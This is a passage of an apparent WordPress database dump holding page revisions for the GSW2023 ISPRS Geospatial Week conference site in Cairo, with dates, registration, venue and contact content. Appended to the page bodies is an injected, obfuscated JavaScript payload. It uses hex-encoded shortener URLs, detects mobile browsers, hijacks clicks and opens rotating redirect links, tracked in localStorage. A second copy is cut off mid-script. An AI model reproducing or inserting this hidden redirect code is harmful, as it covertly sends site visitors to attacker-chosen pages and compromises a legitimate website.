dt_text_icon_color=\"#ffffff\"][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','GSW2023','','inherit','closed','closed','','3066-revision-v1','','','2023-02-04 01:17:36','2023-02-04 01:17:36','',3066,'https://gsw2023.com/?p=3731',0,'revision','',0),
(3732,1,'2023-02-04 01:34:30','2023-02-04 01:34:30','<p>[vc_row][vc_column width=\"1/2\"][vc_column_text]</p>\n<h5><strong>SUBMITION FOR ABSTRACT AND FULL PAPER OPEN NOW</strong></h5>\n<p>[/vc_column_text][vc_column_text css=\".vc_custom_1675473187232{border-top-width: 25px !important;padding-top: 25px !important;}\"]</p>\n<h3></h3>\n<h3></h3>\n<h3></h3>\n<h3 class=\"fancy-title entry-title start-animation-done start-animation\" style=\"text-align: justify; color: #311b92;\"><strong>IMPORTANT DATES</strong></h3>\n<p>[/vc_column_text][vc_row_inner][vc_column_inner width=\"1/2\"][ultimate_icon_list icon_size=\"35\" icon_margin=\"10\"][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Full paper submission (Annals): 31 March 2023</strong>[/ultimate_icon_list_item][/ultimate_icon_list][vc_separator style=\"shadow\" border_width=\"5\"][ultimate_icon_list][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Full paper Author notification: 1 May 2023</strong>[/ultimate_icon_list_item][/ultimate_icon_list][/vc_column_inner][vc_column_inner width=\"1/2\"][ultimate_icon_list][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Abstract submission (Archives): 15 April 2023</strong>[/ultimate_icon_list_item][/ultimate_icon_list][vc_separator style=\"shadow\" border_width=\"5\"][ultimate_icon_list icon_size=\"35\" icon_margin=\"10\"][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Abstract Author notification: 15 May 2023</strong>[/ultimate_icon_list_item][/ultimate_icon_list][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"5\"][vc_row_inner css=\".vc_custom_1668021047643{margin-top: 25px !important;}\"][vc_column_inner css=\".vc_custom_1668021165897{padding-top: 40px !important;}\"][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fimportant-dates%2F\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"300\" css=\".vc_custom_1668192997249{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]ALL IMPORTANT DATES[/dt_default_button][dt_default_button size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"300\" css=\".vc_custom_1675469129167{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]SUBMIT YOUR PAPER NOW[/dt_default_button][/vc_column_inner][/vc_row_inner][/vc_column][vc_column width=\"1/2\"][vc_row_inner css=\".vc_custom_1668005438919{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_inner width=\"1/4\"][vc_single_image image=\"3103\" img_size=\"120x120\" alignment=\"center\" css=\".vc_custom_1668204801057{margin-top: 1px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"][/vc_column_inner][vc_column_inner width=\"3/4\" css=\".vc_custom_1668010702427{margin-top: 35px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][ult_countdown count_style=\"ult-cd-s2\" datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin,ssec\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_style=\"font-weight:bold;\" timer_unit_font_family=\"font_family:|font_call:\" tick_unit_style=\"font-weight:bold;\" css_countdown=\".vc_custom_1668204929553{margin-top: 20px !important;}\" tick_size=\"desktop:50px;\"][/vc_column_inner][/vc_row_inner][vc_single_image image=\"3162\" img_size=\"1149x800\"][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"custom\" border_width=\"10\" accent_color=\"#311b92\"][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-vz-jquery\" bg_image_new=\"id^3189|url^https://gsw2023.com/wp-content/uploads/2022/11/cairo-egypt_shutterstock_1421974805-scaled.jpg|caption^null|alt^null|title^cairo-egypt_shutterstock_1421974805|description^null\" parallax_sense=\"40\" bg_override=\"ex-full\" enable_overlay=\"enable_overlay_value\" overlay_color=\"rgba(0,0,0,0.6)\" type=\"vc_default\" css=\".vc_custom_1668018620108{padding-top: 100px !important;padding-bottom: 105px !important;}\"][vc_column width=\"5/6\" offset=\"vc_col-lg-offset-3 vc_col-lg-6 vc_col-md-offset-1 vc_col-md-10 vc_col-sm-offset-1\" el_class=\"text-centered\"][ultimate_heading main_heading=\"REGISTRATION\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]Opening of registration platform: soon[/ultimate_heading][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fregistration%2F\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" css=\".vc_custom_1665287063394{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]INFORMATION[/dt_default_button][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fcontact%2F\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" css=\".vc_custom_1665182763974{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]CONTACT US[/dt_default_button][/vc_column][/vc_row][vc_row css=\".vc_custom_1668205719738{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column width=\"1/2\" css=\".vc_custom_1668010547399{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_single_image image=\"3289\" img_size=\"1200x1000\"][/vc_column][vc_column width=\"1/2\" css=\".vc_custom_1668010506951{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_row_inner css=\".vc_custom_1668205634615{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"][vc_column_inner][vc_column_text]</p>\n<h2 style=\"color: #311b92; text-align: left;\"><strong> EGYPT GSW\'2023</strong></h2>\n<p>&nbsp;</p>\n<h3></h3>\n<p>[/vc_column_text][vc_column_text]</p>\n<p style=\"text-align: justify;\">As we celebrate our 50th anniversary, the Arab Academy for Science, Technology, and Maritime Transport (AASTMT) is honored to host the ISPRS first Geospatial Week in Africa and Middle East in 2023 (GSW-2023) that will be held under the auspices of H.E Secretary-General of the League of Arab States. The conference will be held in September 2023, at the InterContinental Cairo City stars Cairo, Egypt. AASTMT strongly believes that science is the key to the future and the cornerstone for nations\' progress and prosperity.</p>\n<p>[/vc_column_text][/vc_column_inner][/vc_row_inner][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fwelcome%2F\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1668029705082{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]Read More[/dt_default_button][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"custom\" style=\"shadow\" border_width=\"7\" accent_color=\"#311b92\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3229\" img_size=\"700x525\"][/vc_column][vc_column width=\"1/2\"][vc_single_image image=\"3225\" img_size=\"675x480\"][dt_default_button link=\"url:https%3A%2F%2Faast.edu%2Fen%2F|target:_blank\" smooth_scroll=\"y\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" animation=\"swing\" css=\".vc_custom_1668027792405{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]MORE[/dt_default_button][/vc_column][/vc_row][vc_row bg_type=\"grad\" bg_override=\"ex-full\" type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668009257885{padding-top: 40px !important;padding-bottom: 60px !important;}\" bg_grad=\"background: -webkit-gradient(linear, left top, left bottom, color-stop(10%, #311B92), color-stop(95%, #311B45));background: -moz-linear-gradient(left,#311B92 10%,#311B45 95%);background: -webkit-linear-gradient(left,#311B92 10%,#311B45 95%);background: -o-linear-gradient(left,#311B92 10%,#311B45 95%);background: -ms-linear-gradient(left,#311B92 10%,#311B45 95%);background: linear-gradient(left,#311B92 10%,#311B45 95%);\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][vc_row_inner][vc_column_inner width=\"1/2\"][dt_fancy_title title=\"GSW2023 Venue\" title_size=\"h2\" title_color=\"accent\" separator_style=\"disabled\" el_width=\"200\"][vc_separator color=\"white\" style=\"shadow\" border_width=\"5\"][vc_column_text]</p>\n<h4 style=\"text-align: justify; color: cyan;\">GSW2023 Will be held at the</h4>\n<h4 style=\"text-align: justify; color: white;\"><strong>INTERCONTINENTAL CAIRO SEMIRAMIS</strong></h4>\n<p>&nbsp;</p>\n<h4 style=\"text-align: justify; color: cyan;\"><strong>MORE INFORMATION</strong></h4>\n<h5 style=\"text-align: justify; color: white;\"><strong>The Arab Academy for Science, Science, and Maritime Transport</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Office of the Vice President of the Academy for Graduate Studies and Scientific Research</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>P.O. Box 1029 -Gamal Abdelnaser st. -Miami ,Alexandria</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Tel :(+203) 5497598</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Fax:(+203) 5497598</strong></h5>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_gmaps link=\"#E-8_JTNDaWZyYW1lJTIwc3JjJTNEJTIyaHR0cHMlM0ElMkYlMkZ3d3cuZ29vZ2xlLmNvbSUyRm1hcHMlMkZlbWJlZCUzRnBiJTNEJTIxMW0xOCUyMTFtMTIlMjExbTMlMjExZDM0NTMuNzgzNzk1Mjk1ODM5JTIxMmQzMS4yMjk4MDEzMTUxMTUwMiUyMTNkMzAuMDQzMDU5OTgxODgyNzc0JTIxMm0zJTIxMWYwJTIxMmYwJTIxM2YwJTIxM20yJTIxMWkxMDI0JTIxMmk3NjglMjE0ZjEzLjElMjEzbTMlMjExbTIlMjExczB4MCUyNTNBMHg4Mzk4MmRiOWY2ODY5Y2ElMjEyek16RENzREF5SnpNMUxqQWlUaUF6TWNLd01UTW5OVFV1TWlKRiUyMTVlMCUyMTNtMiUyMTFzZW4lMjEyc2VnJTIxNHYxNjYzMzI1MDg5MDEwJTIxNW0yJTIxMXNlbiUyMTJzZWclMjIlMjB3aWR0aCUzRCUyMjg4NSUyMiUyMGhlaWdodCUzRCUyMjQ1MCUyMiUyMHN0eWxlJTNEJTIyYm9yZGVyJTNBMCUzQiUyMiUyMGFsbG93ZnVsbHNjcmVlbiUzRCUyMiUyMiUyMGxvYWRpbmclM0QlMjJsYXp5JTIyJTIwcmVmZXJyZXJwb2xpY3klM0QlMjJuby1yZWZlcnJlci13aGVuLWRvd25ncmFkZSUyMiUzRSUzQyUyRmlmcmFtZSUzRSUyMA==\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668026824667{padding-top: 40px !important;padding-bottom: 40px !important;}\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][ultimate_heading main_heading=\"GSW\'2023\" main_heading_color=\"#311b92\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\"][/ultimate_heading][vc_separator color=\"custom\" style=\"shadow\" border_width=\"10\" accent_color=\"#40f7e5\"][ult_countdown datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_sep_col=\"#311b92\" tick_unit_style=\"font-weight:bold;\" tick_style=\"font-weight:bold;\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][dt_icon_text dt_text_title=\"info@gsw2023.com\" dt_text_custom_title_color=\"#311b92\" dt_text_desc=\"\" show_btn=\"n\" dt_text_icon_border_width=\"2px\" dt_text_icon_color=\"#ffffff\"][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\